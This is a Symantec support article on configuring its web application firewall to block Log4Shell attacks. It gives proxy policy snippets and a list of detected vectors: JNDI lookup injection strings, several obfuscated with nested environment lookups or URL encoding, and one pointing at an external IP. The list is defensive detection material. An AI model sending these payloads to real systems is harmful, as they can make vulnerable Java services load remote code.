Symantec Web Application Firewall (WAF) Protection for Log4Shell attack.
search cancel

Symantec Web Application Firewall (WAF) Protection for Log4Shell attack.

book

Article ID: 230903

calendar_today

Updated On:

Products

Web Application Firewall

Issue/Introduction

Protection Prerequisites:

ProxySG versions 6.7.x and greater 

Latest application protection version 20210921. See “New attack permutations” section for examples on how to stay up-to-date even if you are not subscribed to application protection

Symantec WAF detects payloads in the request including all query string keys and values, header keys and values, post keys and value and cookie keys and values.

Resolution

The Symantec WAF has many engines and settings. The example below is provided to ensure the WAF has at a minimum these options enabled.

If the WAF was configured via the WAF Management Center UX then the default profile will have correctly included this configuration.

<proxy>
http.request.normalization.default(auto)

<proxy>
http.request.detection.other.invalid_encoding(block) \
http.request.detection.other.multiple_encoding(block) 

define application_protection_set WAF_engines
engine=blacklist
end

<proxy>
http.request.detection.WAF_engines(block)


Vector Detection Results

While the set of permutations is very large, the following vectors are shown below as an example of attacks that are detected:

${env:jndi}

${jdni:}

${jndi:ldap}

${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}}/

${${uPBeLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}${fGX:L:KhSyJ:-:}${E:o:wsyhug:LGVMcx:-l}${Prz:-d}${d:PeH:OmFo:GId:-a}${NLsTHo:-p}${uwF:eszIV:QSvP:-:}${JF:l:U:-/}${AyEC:rOLocm:-:}}

${jndi:dns://45.83.64.1/securityscan-https:8443}

${${env:lsweqw:-j}ndi${env:lsweqw:-:}${env:lsweqw:-r}mi${env:lsweqw:-:}//IP}

${JNDI:LDAPS://}

${JNDI:RMI://}

${JNDI:DNS://}

${JNDI:NIS://}

${JNDI:IIOP://}

${JNDI:CORBA://}

${JNDI:NDS://}

${JNDI:HTTPS://}

${JNDI:HTTP://}

${jNDi:l%252564ap://}

 

New attack permutations

New attack permutations are expected and it is very likely that the signatures will need to be updated. Fortunately the Symantec WAF enables an administrator to write custom rules to detect these new vectors. The minimum policy required for this uses the following form:

<proxy>
http.request.normalization.default(auto)

<proxy>
deny http.request[name,value].regex = <latest security research regex1>
deny http.request[name,value].regex = <latest security research regex2>
Powered by Wolken Software